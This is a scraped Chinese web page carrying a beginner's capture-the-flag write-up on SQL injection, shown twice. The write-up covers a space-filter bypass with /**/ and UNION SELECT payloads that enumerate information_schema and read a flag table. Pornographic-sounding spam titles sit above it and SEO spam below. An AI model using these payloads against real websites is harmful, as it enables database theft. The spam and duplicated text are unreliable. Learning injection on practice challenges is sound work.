国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 數據庫 > SQL Server > 正文

分享一個簡單的sql注入

2024-08-31 01:04:59
字體:
來源:轉載
供稿:網友

所謂SQL注入,就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字符串,最終達到欺騙服務器執行惡意的SQL命令。具體來說,它是利用現有應用程序,將(惡意)的SQL命令注入到后臺數據庫引擎執行的能力,它可以通過在Web表單中輸入(惡意)SQL語句得到一個存在安全漏洞的網站上的數據庫,而不是按照設計者意圖去執行SQL語句。比如先前的很多影視網站泄露VIP會員密碼大多就是通過WEB表單遞交查詢字符暴出的,這類表單特別容易受到sql注入攻擊。

分別輸入1,2,3有對應的結果

sql,注入

使用'會報錯,于是

構造常用的sql語句:1' and '1'='1

sql,注入

沒有反應試一試1' and '1'='2

sql,注入

還是沒反應,工具提示,應該是過濾了什么,改一下sql語句試一試

1and1=1

sql,注入

可以顯示東西,經過判斷過濾了空格,我們使用/**/來代替空格

試一試1'/**/and/**/'1'='1

發現有結果了:

于是構建sql語句:

判斷有那些數據庫:

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

可以看到結果:

sql,注入

查看有哪些數據表:

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

sql,注入

發現了flag的表,我們猜測應該是在web1數據庫中并且字段就是flag(其實就在本頁面的數據庫中)

故:

1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1

sql,注入

本人也是初學者,參考了許多大佬的wp 自己寫出來后有什么錯誤的地方,希望大家指出,謝謝!

根據頁面提示,到底過濾了什么東西?可以知道一定過濾了什么....

分別輸入1,2,3有對應的結果

sql,注入

使用'會報錯,于是

構造常用的sql語句:1' and '1'='1

sql,注入

沒有反應試一試1' and '1'='2

sql,注入

還是沒反應,工具提示,應該是過濾了什么,改一下sql語句試一試

1and1=1

sql,注入

可以顯示東西,經過判斷過濾了空格,我們使用/**/來代替空格

試一試1'/**/and/**/'1'='1

發現有結果了:

于是構建sql語句:

判斷有那些數據庫:

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

可以看到結果:

sql,注入

查看有哪些數據表:

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

sql,注入

發現了flag的表,我們猜測應該是在web1數據庫中并且字段就是flag(其實就在本頁面的數據庫中)

故:

1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1

sql,注入

總結

以上所述是小編給大家介紹的一個簡單的sql注入,希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會及時回復大家的。在此也非常感謝大家對VeVb武林網網站的支持!


注:相關教程知識閱讀請移步到MSSQL教程頻道。
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 孝义市| 侯马市| 禹城市| 亚东县| 万安县| 利辛县| 绍兴市| 乐昌市| 沙雅县| 大足县| 涟水县| 罗平县| 旬阳县| 沛县| 开化县| 抚州市| 侯马市| 微博| 柳江县| 长葛市| 浦东新区| 来凤县| 望谟县| 新密市| 城固县| 桃江县| 鹤岗市| 渝中区| 龙川县| 手游| 牟定县| 房山区| 玛曲县| 康乐县| 留坝县| 庆阳市| 广元市| 鸡西市| 上饶县| 海原县| 黔南|